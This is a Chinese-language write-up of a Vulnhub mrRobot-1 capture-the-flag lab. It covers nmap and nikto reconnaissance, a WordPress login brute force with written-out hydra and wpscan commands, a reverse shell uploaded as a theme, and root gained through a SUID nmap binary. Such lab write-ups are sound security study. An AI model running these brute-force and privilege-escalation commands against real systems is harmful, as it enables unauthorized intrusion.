Vulnhub百个项目渗透
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)
🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月24日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
前言
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。
我要说
这个靶场做的真的很有态度,页面吊炸天,我反正拿到手里认认真真的看完了他的前端,真棒做的
一、梳理流程
- 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
- 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
- 二次收集(基于已得到的服务或者主机再次信息收集)
- 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
- 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)
二、使用步骤
一、信息收集
nmap 192.168.247.156
nmap -sS -sV -A -T5 192.168.247.156
--------------------------
22/tcp closed ssh
80/tcp open http
443/tcp open https
到这里基本可以知道他有一个关闭的ssh,还有https,可能有的网站你http访问不到但是https就可以,这个要注意
curl http://192.168.247.156
nikto -h 192.168.247.156
gobuster也可以用,但是太长了实在是懒得敲
看到了这么多,属实扫了半天,最终发现了这是个wordpress的站点,还有一个robots.txt,这个敏感文件就算不扫也要访问,无论我何时何地,统统访问。
发现了一个字典还有一个txt文件,访问过后发现这个txt是一个flag,然后访问那个字典会自动下载
然后这个是登陆页面,没有弱口令,这个时候就应该想到这个刚才拿到的字典。
然后再开个漏扫,过一会看看扫描结果
二、爆破
爆破准备(字典缩减)
https://www.runoob.com/linux/linux-comm-sort.html
利用sort这个linux函数,将得到的密码本进行优化
sort rong.txt | uniq > rong1.txt
-u, --unique 配合-c,严格校验排序;不配合-c,则只输出一次排序结果
爆破检查
首先就是要检查逻辑,因为在登陆的时候有的网站会准确的显示无效的账号,无效的密码,还有的无效的账号或密码。前两种就很好借助逻辑问题去筛选出正确的用户名,我们现在bp抓包看一下回显包是怎么反馈的。
如图所示,接下来我们要找个工具去批量发请求然后还要排除掉这个Invalid username
hydra -L rong1.txt -p balabala 192.168.247.156 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
wpscan -U Elliot -P rong1.txt --url http://192.168.247.156
[SUCCESS] - Elliot / ER28-0652
成功爆破了!
或者用burpsuit 单变量,然后把密码本加进去,不会用的就用wpscan爆破就行,我比较了一下,
wpscan真的快,bp可能爆破了有10分钟,wpscan一分钟吧差不多
PS:强烈建议大家把windows的自动更新关了,我刚才开的另一台扫描器扫的这个站,没仔细看就截了个图放上来,然后我刚准备回头去看一眼有啥洞的时候,发现:
惊呆了老铁
他居然在自动更新--------- 真tm无语
三、文件上传突破
因为做过很多wp的题,这个玩意一般都面领着文件上传漏洞,刚才AWVS也扫出来了来着
我进站一顿找,我感觉有可以造成XSS的一个公告栏,然后一个文件上传的一个接口,只是怀疑哈,然后搭配着AWVS才确定真的有一个文件上传,不放心的还可以WPSCAN扫一下,不影响。
下面这个是网上搜的,已知cms到处是exp 点击:Appearance->Add New->Upload Theme->文件上传
那么现在就是确定了方向,上传一个混淆过的php反连脚本,然后拿shell
这就看到了我们刚才传的脚本
kali这边开个端口接着,就拿到了shell
四、提权
提权三剑客,还有众多的提权检索语句,这里我没有用脚本,懒得跑了,用了最常用的
ls -la
发现当前目录下就有2-3的flag,然后还有一个md5的密码
我,们直接放到cmd5去解密
得到robot用户密码abcdefghijklmnopqrstuvwxyz
su robot
abcdefghijklmnopqrstuvwxyz
find / -perm -4000 2>/dev/null
查找具有具有最高权限的文件
发现了这几个特别的
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
namp提权
find / -name nmap 2>/dev/null --找到nmap在哪里
/usr/local/bin/nmap
/usr/local/share/nmap
---有上面这两个目录,我们选择bin目录下的nmap
!id
!/bin/bash -p
-p是特权模式,这里借助的原理是nmap按照root运行,然后namoa也有自己的shell